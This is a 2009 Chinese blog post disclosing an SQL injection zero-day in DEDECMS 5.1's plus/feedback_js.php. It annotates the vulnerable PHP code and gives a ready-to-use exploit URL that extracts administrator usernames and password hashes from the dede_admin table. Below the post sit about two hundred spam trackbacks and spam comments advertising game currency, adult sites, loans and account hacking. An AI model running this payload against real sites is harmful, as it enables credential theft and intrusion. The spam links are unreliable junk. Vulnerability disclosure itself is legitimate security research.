DEDECMS 5.1 feedback_js.php 0DAY
This entry was posted on Oct 11 2009
作者:st0p Rainy'Fox
转载请注明出处:http://www.st0p.org http://bbs.erpangzi.com/
这个漏洞是我和Rainy'Fox一起发现的
同样是在magic_quotes_gpc=off的情况下可用
漏洞版本:DEDECMS 5.1
此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | ...... $urlindex = 0; if(empty($arcID)) { $row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' "); //此处$arcurl没有过滤 if(is_array($row)) $urlindex = $row['id']; //存在结果则把$urlindex赋值为查询到的$row['id'],我们可以构造SQL语句带入下面的操作中了 } if(empty($arcID) && empty($urlindex)) exit(); //如果$arcID为空或$urlindex为空则退出 ...... if(empty($arcID)) $wq = " urlindex = '$urlindex' "; //我们让$arcID为空,刚才上面执行的结果就会被赋值给$wq带入下面的操作中执行了. else $wq = " aid='$arcID' "; $querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc"; $dlist->Init(); $dlist->SetSource($querystring); ...... |
看一下利用方法吧,嘿,为了闭合我用了两次union
1 | http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=' |
唉,偶和Rainy'Fox这家伙找目标测试的时候,他竟然说能不能在magic_quotes_gpc=on时通过....这种想法太YD了..也太可怕了,要真可以实现,这个网络界又该乱了,好多程序都是在PHP默认magic_quotes_gpc为关闭时才会调用自身的转义部分...要真能实现,那就是PHP程序的恶梦了...
206 Responses
to “DEDECMS 5.1 feedback_js.php 0DAY”
199 Trackback(s)
- Oct 28, 2009: DEDECMS 5.1 feedback_js.php 0DAY | 鬼仔's Blog
- Oct 29, 2009: 合利工作室 » DEDECMS 5.1 feedback_js.php 0DAY
- Nov 5, 2011: Centerport NY garage door repair
- Nov 10, 2011: vigrx plus review
- Nov 11, 2011: hyip liberty reserve
- Nov 12, 2011: basement waterproofing in Milledgeville OH
- Nov 12, 2011: buy kratom
- Nov 16, 2011: Weight Loss Tips
- Nov 16, 2011: Landscaping Service
- Nov 16, 2011: Cheap Bar Prep Faucets
- Nov 17, 2011: Maverik Rome Lacrosse Gloves
- Nov 17, 2011: Cheap Fires
- Nov 19, 2011: epub ebook download
- Nov 19, 2011: Glendale Personal Injury Lawyer
- Nov 21, 2011: Bodybuilding
- Nov 28, 2011: facebook123
- Nov 28, 2011: work asbestos claim
- Nov 29, 2011: rehab doctor
- Nov 30, 2011: Potenshojande medel
- Nov 30, 2011: film gay
- Nov 30, 2011: Ball gowns
- Nov 30, 2011: Free FAFSA
- Nov 30, 2011: Hair Removal
- Dec 1, 2011: liberty reserve profit
- Dec 3, 2011: mudjacking Kansas City
- Dec 3, 2011: spray tan cardiff
- Dec 3, 2011: Variac Fan Controller
- Dec 3, 2011: Play Online Casino
- Dec 3, 2011: civil engineer software
- Dec 6, 2011: Hula Beach Patio Umbrella
- Dec 6, 2011: ntn bearings
- Dec 6, 2011: payday loans
- Dec 6, 2011: blood clot disease
- Dec 7, 2011: Schwinn 430 Elliptical Trainer
- Dec 7, 2011: medical negligence claims
- Dec 7, 2011: Personal Injury Solicitor London
- Dec 7, 2011: Baby Blog
- Dec 7, 2011: bluehost review
- Dec 9, 2011: snowblowers on sale
- Dec 9, 2011: online investment services
- Dec 9, 2011: Wedding Photographer Sussex
- Dec 11, 2011: Master Resell Rights Ebooks
- Dec 11, 2011: build a shelter
- Dec 12, 2011: mint green dress
- Dec 12, 2011: beats by dre wallpapers
- Dec 13, 2011: water damage Kansas City
- Dec 13, 2011: notaris in antwerpen
- Dec 13, 2011: go local
- Dec 13, 2011: gift reviews
- Dec 13, 2011: sugar crm
- Dec 13, 2011: workout results
- Dec 14, 2011: stamina recumbent exercise bike
- Dec 14, 2011: car accident injury claim
- Dec 14, 2011: work contact dermatitis claim
- Dec 14, 2011: personal injury claims
- Dec 14, 2011: work burns claim
- Dec 16, 2011: Network Consultant
- Dec 16, 2011: Email christmas cards
- Dec 16, 2011: Buy Used Cisco
- Dec 16, 2011: disposable numbers
- Dec 16, 2011: Penny Auction
- Dec 16, 2011: incident notification
- Dec 16, 2011: motorbike injury compensation
- Dec 16, 2011: ligament injury claims
- Dec 16, 2011: work injury compensation
- Dec 16, 2011: medical malpractice
- Dec 16, 2011: whiplash injury
- Dec 16, 2011: fake girls
- Dec 17, 2011: free xxx passwords
- Dec 17, 2011: Weapons Storage
- Dec 18, 2011: iah
- Dec 19, 2011: Carrier Parts
- Dec 19, 2011: create free blog
- Dec 19, 2011: tech
- Dec 20, 2011: ipad 3
- Dec 20, 2011: jobs employment
- Dec 22, 2011: lashes
- Dec 22, 2011: careersplusresumes.com reviews
- Dec 22, 2011: Cut the Rope
- Dec 23, 2011: The Girl With The Dragon Tattoo FULL MOVIE
- Dec 27, 2011: Swingers Blog
- Dec 27, 2011: reconquistar
- Dec 27, 2011: pkv wechsel
- Dec 28, 2011: wordpress themes
- Dec 28, 2011: Vaginal tightening cream
- Dec 31, 2011: Come aumentare la massa muscolare
- Dec 31, 2011: ganhar dinheiro
- Dec 31, 2011: comprar enlaces
- Dec 31, 2011: como ganhar dinheiro
- Dec 31, 2011: deck lighting
- Dec 31, 2011: micromax mobiles india
- Dec 31, 2011: wrong diagnosis
- Dec 31, 2011: personal injury lawyer
- Jan 1, 2012: scheduling appointments online
- Jan 1, 2012: mobile site marketing
- Jan 2, 2012: lesbian
- Jan 2, 2012: Eenzaamheid
- Jan 2, 2012: Restaurants In Salem MA
- Jan 2, 2012: xxx tube
- Jan 3, 2012: organic cotton baby clothes
- Jan 4, 2012: creme vergeturi
- Jan 4, 2012: Hack Facebook Accounts
- Jan 4, 2012: backlinking
- Jan 5, 2012: TwoCanDo Books
- Jan 5, 2012: tripazon
- Jan 5, 2012: Cheap Drug Rehab
- Jan 5, 2012: Survivalist Tips
- Jan 5, 2012: interior designer singapore
- Jan 5, 2012: Lighting Design in Cabins
- Jan 5, 2012: st george acupuncture
- Jan 5, 2012: AdvoCare Challenge Instructions
- Jan 6, 2012: wicked tickets
- Jan 6, 2012: bridal gowns in Rancho Mirage CA
- Jan 6, 2012: incident communications systems
- Jan 6, 2012: Diablo 3 Mods
- Jan 6, 2012: high chair injury compensation
- Jan 6, 2012: Free Inmate Locator
- Jan 6, 2012: high chair injury compensation
- Jan 7, 2012: game
- Jan 7, 2012: lip kiss
- Jan 8, 2012: Aviva Design
- Jan 9, 2012: site
- Jan 9, 2012: free movie streaming
- Jan 9, 2012: Video Product Reviews
- Jan 9, 2012: oakley x squared review
- Jan 9, 2012: Tandarts Almere
- Jan 10, 2012: resume
- Jan 10, 2012: legitimate paid surveys
- Jan 11, 2012: buy facebook fans
- Jan 11, 2012: halong bay guide
- Jan 11, 2012: tech blog seo phone new any time
- Jan 11, 2012: accident in Sainsburys
- Jan 12, 2012: personal injury solicitor
- Jan 12, 2012: work injury claims
- Jan 12, 2012: birth injury solicitor
- Jan 13, 2012: Douglas County Real Estate
- Jan 13, 2012: article directory
- Jan 13, 2012: slendertone
- Jan 13, 2012: Air Swimmers
- Jan 13, 2012: Portable Massage Tables
- Jan 14, 2012: Freshwater
- Jan 14, 2012: Ghe giam doc
- Jan 15, 2012: Manhattan NY home alarm systems
- Jan 15, 2012: start an online business
- Jan 15, 2012: TheGoutDiet.org
- Jan 15, 2012: målare åkersberga
- Jan 17, 2012: Locksmith dania beach
- Jan 17, 2012: How early can i take a pregnancy test
- Jan 17, 2012: book en ligne
- Jan 18, 2012: farm accident
- Jan 18, 2012: compensation claims advice
- Jan 19, 2012: Filter paper
- Jan 19, 2012: halloween crafts for kindergarten free
- Jan 19, 2012: mascara
- Jan 20, 2012: clairvoyant phone readings
- Jan 20, 2012: Spindschloss
- Jan 20, 2012: Teutonia
- Jan 22, 2012: aftermarket car warranty reviews
- Jan 22, 2012: Cataclysm Private Server
- Jan 22, 2012: fashion
- Jan 22, 2012: gaming
- Jan 22, 2012: wealth
- Jan 22, 2012: Series Danko
- Jan 22, 2012: NBA Picks
- Jan 24, 2012: gambling
- Jan 24, 2012: Outback Steakhouse Coupons
- Jan 25, 2012: joinery auckland
- Jan 25, 2012: http://www.sixreps.com/blogs/287129/544456/one-hour-payday-loans-is-it-po
- Jan 26, 2012: Reifen
- Jan 26, 2012: Bedford vs. Gagnon Scratched from UFC on FOX | Athletics Incorporated
- Jan 26, 2012: 40oz’ Custom Knife Thread | Gift Ideas and Gifts
- Jan 26, 2012: Minowa VS. Grove – “Crunchtime” Pisani vs GRD! | Fairy Famous
- Jan 26, 2012: Strikeforce champ Tate on Rousey: ‘She better keep that pretty little chin tucked’ « Kari's World
- Jan 26, 2012: bloons tower defense 5
- Jan 27, 2012: Nassau county attorney
- Jan 27, 2012: Eggo coupons
- Jan 27, 2012: Nature Made coupons
- Jan 27, 2012: Crest toothpaste coupons
- Jan 27, 2012: indian sex stories
- Jan 28, 2012: double glazed windows
- Jan 28, 2012: hobbies
- Jan 28, 2012: tandartsen almere
- Jan 28, 2012: Berkeley Chiropractor
- Jan 28, 2012: Just Tires coupons
- Jan 28, 2012: chicago limo
- Jan 30, 2012: wordpress magazine themes
- Feb 1, 2012: Sex Geschichten
- Feb 1, 2012: Baseball T shirts Design
- Feb 1, 2012: etax
- Feb 1, 2012: Sex Geschichten
- Feb 1, 2012: Sex Geschichten
- Feb 2, 2012: Top Penny Stocks
- Feb 3, 2012: stelivo
- Feb 3, 2012: herramientas de taller mecanico
- Feb 3, 2012: San Diego SEO
- Feb 3, 2012: Superbowl 46 Betting
- Feb 3, 2012: tuxedo rental
- Feb 4, 2012: Tamil Sex Stories
- Feb 5, 2012: bodybuilding pics
You must be logged in to post a comment.
zelo intiresno, hvala
I stand here today humbled by the task before [url=http://www.bawwgt.com]dofus kamas[/url], grateful for the trust you have bestowed, mindful of the sacrifices borne by our [url=http://www.bawwgt.com]cheap dofus kamas[/url]. I thank President [url=http://www.bawwgt.com]dofus power leveling[/url] for his service to [url=http://www.bawwgt.com]buy dofus kamas[/url], as well as the generosity and cooperation he has shown throughout this transition.
CMvNTO honoyhhectcq, [url=http://bqjmruocdqwf.com/]bqjmruocdqwf[/url], [link=http://mdbdixbzaeau.com/]mdbdixbzaeau[/link], http://njofsuttytxm.com/
Only 34 days before DOFUS 2.0! December 2nd will be here before we know [url=http://www.bawwgt.com/fr]dofus kamas[/url]. On [url=http://www.bawwgt.com/fr]dofus kamas moins chers[/url] every player will discover a completely new DOFUS experience. [url=http://www.bawwgt.com/fr]acheter des dofus kamas[/url] have to be content with the reports and forums. Even so [url=http://www.bawwgt.com/fr]achat dofus kamas[/url], there¡¯s always a few of our dear players in the forums.
this is a cool news. Thank you.
huh... informative style..
Vdaka za zaujimavy blog